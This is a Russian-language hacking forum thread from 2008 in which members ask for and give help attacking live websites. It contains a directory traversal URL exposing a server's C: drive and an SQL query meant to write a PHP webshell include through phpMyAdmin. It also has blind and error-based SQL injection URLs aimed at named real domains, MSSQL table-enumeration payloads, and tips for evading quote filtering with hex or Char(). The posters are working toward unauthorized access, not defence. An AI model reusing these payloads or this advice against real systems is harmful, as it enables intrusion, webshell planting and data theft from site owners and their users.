Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    могу просматривать весь комп:
    http://badisow.49.212-215.is74.ru/userdir/message/messread.php?tm=c://windows

    Что это,PHP-injection?
    Или просто ошибка горе-кодера в ограничении?
     
    1 person likes this.
  2. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Есть трабла:
    Смог получить доступ к БД, нашел пхпмайадмин, далее пытаюсь залить шелл через запрос. Делаю так:

    Code:
    CREATE TABLE `123` (`shl` TEXT NOT NULL) TYPE = MYISAM;  INSERT INTO `123` ( `shl` ) VALUES ('<?php include("тут_адрес_к_шеллу.php") ?>');  SELECT `shl` FROM `123` INTO OUTFILE '';  DROP TABLE `123`
    Но оказывается какой-то запрет. Denied for 'user@localhost' (имя юзера дословно не пишу).

    Может кто-нибудь знает в чем может быть трабла? Или запрос неправильный составляю... :confused:
     
  3. NamahS

    NamahS New Member

    Joined:
    26 Jun 2008
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Я что в игноре?:)
    ПОЖАЛУЙСТА!!!! ПОМОГИТЕ!!!!!!!!!!!
    хотя бы в ПМ
     
    #2603 NamahS, 16 Jul 2008
    Last edited: 16 Jul 2008
  4. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2USAkid по моему ты задавая вопрос сам ответил на него
    для залития шелла тебе нужны права filepriv у данного юзера их нет о чем и говорит данная ошибка ;)
     
  5. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46

    У тебя условие:
    /?part=npcs&id=1+OR+1=(select+db_name(1))

    ошибка генерится в части OR 1=(~запрос~)
    при выводе в результате запроса данных типа int или binary ошибка конвертации не генерится, просто не выполняется равенство. При выводе типов int, binary экспериментируй с типом левой части приравнивания (в данном случае замени единичку).
     
    #2605 Светлый, 16 Jul 2008
    Last edited: 16 Jul 2008
  6. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Блин... Ладно, поищу альтернативу :)
     
  7. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    id=9'+and+1=if((version()=5),1,(select+table_name+from+information_schema.tables))/*

    А почему вдруг не пашет substring() ? И откуда вообще такая конструкция if() ? Хотя работает...
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Количество скобок смущает =_=.Кстати,в таком случае только посимвольный перебор спасёт?)
     
  9. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2велимир а где там substring ? )
     
  10. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Да нет,я вообще говорю,что там не пашет 9'+and+substring(version(),1,1)=5/*

    http://www.rauchfrei-info.de/index.php?id=9'+and+1=if((version()=5),1,(select+table_name+from+information_schema.tables+limit+1,1))/*
     
  11. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    ?id=10-1 не работает )
    and 1=1/* не работает )
    либо просто скули нет либо просто фильтрации какая то очень странная
     
  12. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Да есть там скуля, работает на технологии more than 1 row
    http://www.rauchfrei-info.de/index.php?id=9'+and+1=if(ord(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1))=67,1,(select+table_name+from+information_schema.tables))/*
     
    2 people like this.
  13. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2I-I00K
    пожно по подробнее об этом ? гугль дал результаты на анлийском (\
    ecли можно ссылку что бы почитать )
     
    #2613 MaSTeR GэN, 16 Jul 2008
    Last edited: 16 Jul 2008
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    MaSTeR GэN, ttp://www.xakep.ru/magazine/xa/111/056/1.asp
     
  15. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    2n0ne thx ;)
     
  16. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    С этого момента любой оффтоп в этой теме будет наказыватся отрицательной репутацией. Тема называется ваши вопросы по уязвимостям, а не "нераскрученные скули" или "продайте сплойт". О чем стоит говорить в этой теме сказано в корневом сообщении, это последние китайское предупреждение
     
  17. zavra

    zavra Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    87
    Likes Received:
    48
    Reputations:
    23
    в mssql узнал первую таблицу: content_meta_tbl, пытаюсь узнать другие:
    Code:
    http://www.site.ru/students/content.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('content_meta_tbl'))--
    пишет
    Incorrect syntax near 'content_meta_tbl'.
    Поптыка узнать ячейки из этой таблица закончились также :(
     
  18. zavra

    zavra Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    87
    Likes Received:
    48
    Reputations:
    23
    Code:
    content.asp?id=1+or+1=(SELECT+TOP+2+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users')--
    Incorrect syntax near 'users'.
    что неправильного-то в синтаксисе?(
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ковычки фильтрует, в hex загони users
     
  20. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    можно в Char()
     
Thread Status:
Not open for further replies.